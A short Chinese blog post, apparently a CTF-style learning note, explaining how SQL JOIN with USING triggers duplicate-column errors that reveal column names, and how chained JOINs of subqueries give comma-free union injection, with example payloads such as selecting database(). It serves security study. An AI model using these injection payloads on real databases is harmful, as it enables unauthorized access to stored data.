sql 语句 join 的学习

# 0x00 前言

感谢 0.0 大师傅的细心指导。

# 0x01 join 的含义

# 0x02 对语句的理解

select * from (select * from flag as a join (select * from flag)b using(id))c

a 与 b 首先两个表相连,做为 c 表

在查询时,列名会冲突,导致报错。using 的作用是去重重复列名。

这样就可以一个个的爆破所有列名。

逗号被过滤,这样子可以进行联合注入

select * from(flag join (select 2)b  join (select 3)c  join (select 4)d)

image-20210617211518350

指定回显位置进行替换,就能注入出结果。

select * from(flag join (select database())b  join (select 3)c  join (select 4)d)

image-20210617211741210

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

zeroc 微信支付

微信支付

zeroc 支付宝

支付宝

zeroc 贝宝

贝宝